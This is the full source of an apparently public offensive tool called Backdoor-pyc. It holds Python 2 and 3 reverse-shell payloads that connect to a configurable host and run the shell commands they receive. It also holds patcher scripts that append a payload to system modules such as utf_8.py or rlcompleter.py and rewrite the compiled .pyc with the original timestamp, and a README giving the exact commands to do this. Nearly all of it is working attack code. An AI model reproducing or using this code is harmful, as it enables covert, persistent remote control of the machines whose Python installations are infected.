├── testing27.py
├── testing3X.py
├── README.md
├── backdoor-pyc27.py
└── backdoor-pyc3X.py


/testing27.py:
--------------------------------------------------------------------------------
 1 | 
 2 | from multiprocessing import Process, Queue
 3 | 
 4 | # modded from https://www.trustedsec.com/files/RevShell_PoC_v1.py
 5 | # Think of the kids use encryption...
 6 | 
 7 | 
 8 | def moo():
 9 |     import socket
10 |     import subprocess
11 | 
12 |     HOST = '127.0.0.1'     # EDIT Host...
13 |     PORT = 8080            # The same port as used by the server
14 |     s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
15 |     s.connect((HOST, PORT))
16 |     # loop forever
17 |     while 1:
18 |         # recv command line param
19 | 
20 |         data = s.recv(1024)
21 |         if 'exit' in data:
22 |             break
23 |         # execute command line
24 |         proc = subprocess.Popen(data, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
25 |         # grab output from commandline
26 |         stdout_value = proc.stdout.read() + proc.stderr.read()
27 |         # send back to attacker
28 |         s.send(stdout_value)
29 |     #quit out afterwards and kill socket
30 |     s.close()
31 | 
32 | queue = Queue()
33 | p = Process(target=moo, args=())
34 | p.start()
35 | 


--------------------------------------------------------------------------------
/testing3X.py:
--------------------------------------------------------------------------------
 1 | from multiprocessing import Process, Queue
 2 | 
 3 | # modded from https://www.trustedsec.com/files/RevShell_PoC_v1.py
 4 | # Think of the kids use encryption...
 5 | 
 6 | 
 7 | def moo():
 8 |     import socket
 9 |     import subprocess
10 | 
11 |     HOST = '127.0.0.1'     # EDIT Host...
12 |     PORT = 8080            # The same port as used by the server
13 |     s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
14 |     s.connect((HOST, PORT))
15 |     # loop forever
16 |     while 1:
17 |         # recv command line param
18 | 
19 |         data = s.recv(1024)
20 |         if b'exit' in data:
21 |             break
22 |         # execute command line
23 |         proc = subprocess.Popen(data, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
24 |         # grab output from commandline
25 |         stdout_value = proc.stdout.read() + proc.stderr.read()
26 |         # send back to attacker
27 |         s.send(stdout_value)
28 |     #quit out afterwards and kill socket
29 |     s.close()
30 | 
31 | queue = Queue()
32 | p = Process(target=moo, args=())
33 | p.start()
34 | 
35 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # Backdoor-pyc
 2 | 
 3 | Replace pyc files with malicious pyc files.
 4 | 
 5 | 
 6 | ## Change Log
 7 | 
 8 | ####11/10/2015
 9 | * No more writing to tmp, just edit the pyc file directly
10 | * Bug fixes 
11 | 
12 | ## Prior work
13 | 
14 | 
15 | 	https://www.virusbtn.com/virusbulletin/archive/2011/07/vb201107-reversing-Python#id3072912
16 | 	https://github.com/jgeralnik/Pytroj
17 | 	http://www.slideshare.net/iamit/infecting-python-bytecode
18 | 
19 | ## Usage
20 | 
21 | 	python27|python3X ./backdoor-pyc27.py -h
22 | 
23 | 	Usage: backdoor-pyc27.py [-h] [-p PATH] [-l NIX] [-w WINDOWS]
24 | 
25 | 	To replace utf_8.pyc with your code...
26 | 
27 | 	optional arguments:
28 | 	  -h, --help            show this help message and exit
29 | 	  -p PATH, --path PATH  path to utf_8.pyc
30 | 	  -l NIX, --nix NIX     payload for nix
31 | 	  -w WINDOWS, --windows WINDOWS
32 | 	                        payload for windows
33 | 
34 | 
35 | 
36 | 	*Make edits to the testing27.py file [HOST]*
37 | 
38 | 	For python27
39 | 	python ./backdoor-pyc27.py -l testing27.py -p /usr/lib/python27/encodings/utf_8.py
40 | 
41 | 
42 | 	For python3.X 
43 | 	python3 ./backdoor-pyc3X.py -l testing3X.py -p /usr/lib/python3/rlcompleter.py -v 34  #notice version for python3
44 | 
45 | 
46 | 
47 | ## Contributing
48 | 
49 | Pull requests welcome
50 | 
51 | 


--------------------------------------------------------------------------------
/backdoor-pyc27.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | 
 3 | import struct
 4 | import sys
 5 | import os
 6 | import __builtin__
 7 | import imp
 8 | import marshal
 9 | 
10 | class patch_pyc():
11 |     def __init__(self, org_file, nix_payload=None, windows_payload=None):
12 |         self.nix_payload = nix_payload
13 |         self.windows_payload = windows_payload
14 |         self.org_file = org_file
15 |         self.temp_bytecode = ''
16 |         
17 |         self.read_payloads()
18 |         self.get_bytecode()
19 |         self.write_bytecode()
20 |         self.write_file()
21 | 
22 |     def read_payloads(self):
23 |         if self.nix_payload:
24 |             self.nix = open(self.nix_payload, 'U').read()
25 |         if self.windows_payload:
26 |             self.windows = open(self.windows_payload, 'U').read()
27 | 
28 |     def get_bytecode(self):
29 |         with open(self.org_file, 'U') as g:
30 |             self.codestring = g.read()
31 | 
32 |     def write_bytecode(self):
33 | 
34 |         self.codestring += "\n"
35 |         
36 |         if self.nix_payload:
37 |             self.codestring += self.nix
38 |         if self.windows_payload:
39 |             self.codestring += self.windows
40 | 
41 |         codeobject = __builtin__.compile(self.codestring, self.org_file, 'exec')
42 |         self.temp_bytecode = marshal.dumps(codeobject)
43 | 
44 |     def write_file(self):
45 |         pyc_file = self.org_file + "c"
46 |         print "PYC file temp location:", pyc_file
47 |         
48 |         timestamp = int(os.stat(self.org_file).st_mtime)
49 | 
50 |         print "Timestamp of python file:", timestamp
51 | 
52 |         with open(pyc_file, 'w') as f:
53 |             f.write(imp.get_magic())
54 |             f.write(struct.pack("<I", timestamp))
55 |             f.write(self.temp_bytecode)
56 | 
57 |         
58 | if __name__ == "__main__":
59 |     import argparse
60 |     parser = argparse.ArgumentParser(description="To replace utf_8.pyc with your code...")
61 |     parser.add_argument("-p", "--path", help="path to utf_8.pyc")
62 |     parser.add_argument("-l", "--nix", help="payload for nix")
63 |     parser.add_argument("-w", "--windows", help="payload for windows")
64 |     args = parser.parse_args()
65 |     
66 |     if not args.path:
67 |         parser.print_help()
68 |         sys.exit()
69 |     if not args.nix and not args.windows:
70 |         parser.print_help()
71 |         sys.exit()
72 |     patch_pyc(args.path, args.nix, args.windows)
73 |     print "Done"
74 | 


--------------------------------------------------------------------------------
/backdoor-pyc3X.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python3
 2 | 
 3 | import struct
 4 | import sys
 5 | import os
 6 | import builtins
 7 | import imp
 8 | import marshal
 9 | import py_compile
10 | 
11 | class patch_pyc():
12 |     def __init__(self, org_file, nix_payload=None, windows_payload=None, version=35):
13 |         self.nix_payload = nix_payload
14 |         self.windows_payload = windows_payload
15 |         self.org_file = org_file
16 |         self.temp_bytecode = ''
17 |         self.version = version
18 |         
19 |         self.read_payloads()
20 |         self.get_bytecode()
21 |         self.write_bytecode()
22 |         self.write_file()
23 | 
24 |     def read_payloads(self):
25 |         if self.nix_payload:
26 |             self.nix = open(self.nix_payload, 'U').read()
27 |         if self.windows_payload:
28 |             self.windows = open(self.windows_payload, 'U').read()
29 | 
30 |     def get_bytecode(self):
31 |         with open(self.org_file, 'U') as g:
32 |             self.codestring = g.read()
33 |         self.oldpycsize = len(self.codestring)
34 |         
35 |     def write_bytecode(self):
36 | 
37 |         self.codestring += "\n"
38 |         
39 |         if self.nix_payload:
40 |             self.codestring += self.nix
41 |         if self.windows_payload:
42 |             self.codestring += self.windows
43 | 
44 |         codeobject = builtins.compile(self.codestring, self.org_file, 'exec')
45 |         self.temp_bytecode = marshal.dumps(codeobject)
46 |         
47 |     def write_file(self):
48 |         
49 |         pyc_file = os.path.dirname(os.path.abspath(self.org_file)) + "/__pycache__/" + \
50 |                    os.path.basename(self.org_file).split(".")[0] + ".cpython-" + self.version + ".pyc"
51 | 
52 |         print("PYC file temp location:", pyc_file)
53 | 
54 |         timestamp = int(os.stat(self.org_file).st_mtime)
55 | 
56 |         print("Timestamp of python file:", timestamp)
57 |         
58 |         print("Length of python file:", self.oldpycsize)
59 |         
60 |         if not os.path.isfile(pyc_file):
61 |             #create it
62 |             py_compile.compile(self.org_file)
63 | 
64 |         #with open(os.path.dirname(os.path.abspath(self.org_file)) + "/__pycache__/" + os.path.basename(self.org_file).split(".")[0] + ".cpython-" + self.version + ".pyc", "r+b") as f:
65 |         #    f.seek(8, 0)
66 |         #    oldpycsize = struct.unpack("<I", f.read(4))[0]
67 | 
68 |         #print("Old pyc size:", oldpycsize)
69 | 
70 |         with open(pyc_file, 'r+b') as f:
71 |             f.write(imp.get_magic())
72 |             f.write(struct.pack("<I", timestamp))
73 |             f.write(struct.pack("<I", self.oldpycsize))
74 |             f.write(self.temp_bytecode)
75 | 
76 |         
77 | if __name__ == "__main__":
78 |     import argparse
79 |     parser = argparse.ArgumentParser(description="To replace rlcompleter.pyc with your code... for example")
80 |     parser.add_argument("-p", "--path", help="path to rlcompleter.py")
81 |     parser.add_argument("-l", "--nix", help="payload for nix")
82 |     parser.add_argument("-w", "--windows", help="payload for windows")
83 |     parser.add_argument("-v", "--version", help="python3.X version - 35 for 3.5")
84 |     args = parser.parse_args()
85 | 
86 |     if not args.path:
87 |         parser.print_help()
88 |         sys.exit()
89 |     if not args.version:
90 |         print("Need python version: '-v 35' for example.")
91 |         parser.print_help()
92 |         sys.exit()
93 |     if not args.nix and not args.windows:
94 |         parser.print_help()
95 |         sys.exit()
96 |     patch_pyc(args.path, args.nix, args.windows, args.version)
97 |     print("Done")
98 | 


--------------------------------------------------------------------------------